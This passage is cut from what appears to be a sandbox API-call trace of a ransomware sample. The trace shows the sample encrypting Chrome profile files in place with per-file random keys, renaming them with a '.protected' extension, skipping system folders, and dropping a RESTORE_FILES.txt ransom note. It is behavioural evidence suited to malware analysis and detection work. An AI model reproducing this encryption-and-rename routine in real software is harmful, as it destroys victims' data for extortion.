cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History") returned 87 [0084.106] StrStrIW (lpFirst="History", lpSrch=".protected") returned 0x0 [0084.106] lstrcmpW (lpString1="History", lpString2="RESTORE_FILES.txt") returned -1 [0084.106] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.106] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.106] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\history"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.107] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History") returned 87 [0084.107] StrStrW (lpFirst="History", lpSrch=".txt") returned 0x0 [0084.107] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History") returned 87 [0084.107] StrStrW (lpFirst="History", lpSrch=".rar") returned 0x0 [0084.107] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History") returned 87 [0084.107] StrStrW (lpFirst="History", lpSrch=".zip") returned 0x0 [0084.107] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.116] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, 
lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.116] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.117] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.117] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.118] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.118] CloseHandle (hObject=0x154) returned 1 [0084.118] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History.protected") returned 97 [0084.118] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\history"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\history.protected")) returned 1 [0084.119] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.119] lstrcmpiW (lpString1="History Provider Cache", lpString2="Windows") returned -1 [0084.119] lstrcmpiW (lpString1="History Provider Cache", 
lpString2="Program Files") returned -1 [0084.119] lstrcmpiW (lpString1="History Provider Cache", lpString2="Program Files (x86)") returned -1 [0084.119] lstrcmpiW (lpString1="History Provider Cache", lpString2="$Recycle.bin") returned 1 [0084.119] lstrcmpiW (lpString1="History Provider Cache", lpString2="System Volume Information") returned -1 [0084.119] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History Provider Cache") returned 102 [0084.119] StrStrIW (lpFirst="History Provider Cache", lpSrch=".protected") returned 0x0 [0084.119] lstrcmpW (lpString1="History Provider Cache", lpString2="RESTORE_FILES.txt") returned -1 [0084.119] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.119] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.120] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History Provider Cache" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\history provider cache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.120] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History Provider Cache") returned 102 [0084.120] StrStrW (lpFirst="History Provider Cache", lpSrch=".txt") returned 0x0 [0084.120] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History Provider Cache") returned 102 [0084.120] StrStrW (lpFirst="History Provider Cache", lpSrch=".rar") returned 0x0 
[0084.120] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History Provider Cache") returned 102 [0084.120] StrStrW (lpFirst="History Provider Cache", lpSrch=".zip") returned 0x0 [0084.120] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x142f, lpOverlapped=0x0) returned 1 [0084.121] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffebd1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.122] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x142f, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x142f, lpOverlapped=0x0) returned 1 [0084.122] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.122] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.122] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.123] CloseHandle (hObject=0x154) returned 1 [0084.123] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History Provider Cache.protected") returned 112 [0084.123] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History Provider Cache" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\history provider cache"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History Provider Cache.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\history provider cache.protected")) returned 1 [0084.124] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.124] lstrcmpiW (lpString1="History-journal", lpString2="Windows") returned -1 [0084.124] lstrcmpiW (lpString1="History-journal", lpString2="Program Files") returned -1 [0084.124] lstrcmpiW (lpString1="History-journal", lpString2="Program Files (x86)") returned -1 [0084.124] lstrcmpiW (lpString1="History-journal", lpString2="$Recycle.bin") returned 1 [0084.124] lstrcmpiW (lpString1="History-journal", lpString2="System Volume Information") returned -1 [0084.124] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History-journal") returned 95 [0084.124] StrStrIW (lpFirst="History-journal", lpSrch=".protected") returned 0x0 [0084.124] lstrcmpW (lpString1="History-journal", lpString2="RESTORE_FILES.txt") returned -1 [0084.124] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.124] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.124] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\history-journal"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.125] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History-journal") returned 95 [0084.125] StrStrW (lpFirst="History-journal", lpSrch=".txt") returned 0x0 [0084.125] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History-journal") returned 95 [0084.125] StrStrW (lpFirst="History-journal", lpSrch=".rar") returned 0x0 [0084.125] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History-journal") returned 95 [0084.125] StrStrW (lpFirst="History-journal", lpSrch=".zip") returned 0x0 [0084.125] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0084.125] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.125] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0084.126] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.126] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.126] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 
[0084.126] CloseHandle (hObject=0x154) returned 1 [0084.127] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History-journal.protected") returned 105 [0084.127] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\history-journal"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History-journal.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\history-journal.protected")) returned 1 [0084.128] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.128] lstrcmpiW (lpString1="JumpListIcons", lpString2="Windows") returned -1 [0084.128] lstrcmpiW (lpString1="JumpListIcons", lpString2="Program Files") returned -1 [0084.128] lstrcmpiW (lpString1="JumpListIcons", lpString2="Program Files (x86)") returned -1 [0084.128] lstrcmpiW (lpString1="JumpListIcons", lpString2="$Recycle.bin") returned 1 [0084.128] lstrcmpiW (lpString1="JumpListIcons", lpString2="System Volume Information") returned -1 [0084.128] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons") returned 93 [0084.128] lstrcmpW (lpString1="JumpListIcons", lpString2=".") returned 1 [0084.128] lstrcmpW (lpString1="JumpListIcons", lpString2="..") returned 1 [0084.128] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\*") returned 95 [0084.128] FindFirstFileW (in: 
lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0084.128] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.128] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.128] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.128] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.128] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.128] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\.") returned 95 [0084.128] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.128] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.128] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.128] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.128] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.128] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.128] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.128] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\..") returned 96 [0084.128] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.128] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.128] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.128] lstrcmpiW (lpString1="A058.tmp", lpString2="Windows") returned -1 [0084.128] lstrcmpiW (lpString1="A058.tmp", lpString2="Program Files") returned 
-1 [0084.129] lstrcmpiW (lpString1="A058.tmp", lpString2="Program Files (x86)") returned -1 [0084.129] lstrcmpiW (lpString1="A058.tmp", lpString2="$Recycle.bin") returned 1 [0084.129] lstrcmpiW (lpString1="A058.tmp", lpString2="System Volume Information") returned -1 [0084.129] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A058.tmp") returned 102 [0084.129] StrStrIW (lpFirst="A058.tmp", lpSrch=".protected") returned 0x0 [0084.129] lstrcmpW (lpString1="A058.tmp", lpString2="RESTORE_FILES.txt") returned -1 [0084.129] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0084.129] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0084.129] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A058.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticons\\a058.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0084.129] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A058.tmp") returned 102 [0084.129] StrStrW (lpFirst="A058.tmp", lpSrch=".txt") returned 0x0 [0084.129] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A058.tmp") returned 102 [0084.129] StrStrW (lpFirst="A058.tmp", lpSrch=".rar") returned 0x0 [0084.129] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\JumpListIcons\\A058.tmp") returned 102 [0084.129] StrStrW (lpFirst="A058.tmp", lpSrch=".zip") returned 0x0 [0084.129] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x0, lpOverlapped=0x0) returned 1 [0084.129] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.129] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x0, lpOverlapped=0x0) returned 1 [0084.129] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.130] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0084.130] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0084.130] CloseHandle (hObject=0x158) returned 1 [0084.131] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A058.tmp.protected") returned 112 [0084.131] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A058.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticons\\a058.tmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\JumpListIcons\\A058.tmp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticons\\a058.tmp.protected")) returned 1 [0084.131] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.131] lstrcmpiW (lpString1="A059.tmp", lpString2="Windows") returned -1 [0084.131] lstrcmpiW (lpString1="A059.tmp", lpString2="Program Files") returned -1 [0084.131] lstrcmpiW (lpString1="A059.tmp", lpString2="Program Files (x86)") returned -1 [0084.131] lstrcmpiW (lpString1="A059.tmp", lpString2="$Recycle.bin") returned 1 [0084.131] lstrcmpiW (lpString1="A059.tmp", lpString2="System Volume Information") returned -1 [0084.131] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A059.tmp") returned 102 [0084.131] StrStrIW (lpFirst="A059.tmp", lpSrch=".protected") returned 0x0 [0084.131] lstrcmpW (lpString1="A059.tmp", lpString2="RESTORE_FILES.txt") returned -1 [0084.131] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0084.131] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0084.132] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A059.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticons\\a059.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0084.132] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\JumpListIcons\\A059.tmp") returned 102 [0084.132] StrStrW (lpFirst="A059.tmp", lpSrch=".txt") returned 0x0 [0084.132] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A059.tmp") returned 102 [0084.132] StrStrW (lpFirst="A059.tmp", lpSrch=".rar") returned 0x0 [0084.132] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A059.tmp") returned 102 [0084.132] StrStrW (lpFirst="A059.tmp", lpSrch=".zip") returned 0x0 [0084.132] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x0, lpOverlapped=0x0) returned 1 [0084.132] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.132] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x0, lpOverlapped=0x0) returned 1 [0084.133] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.133] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0084.133] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0084.133] CloseHandle (hObject=0x158) returned 1 [0084.134] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A059.tmp.protected") returned 112 [0084.134] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A059.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticons\\a059.tmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A059.tmp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticons\\a059.tmp.protected")) returned 1 [0084.134] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0084.134] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0084.134] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\RESTORE_FILES.txt") returned 111 [0084.134] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticons\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.136] lstrlenA (lpString="! 
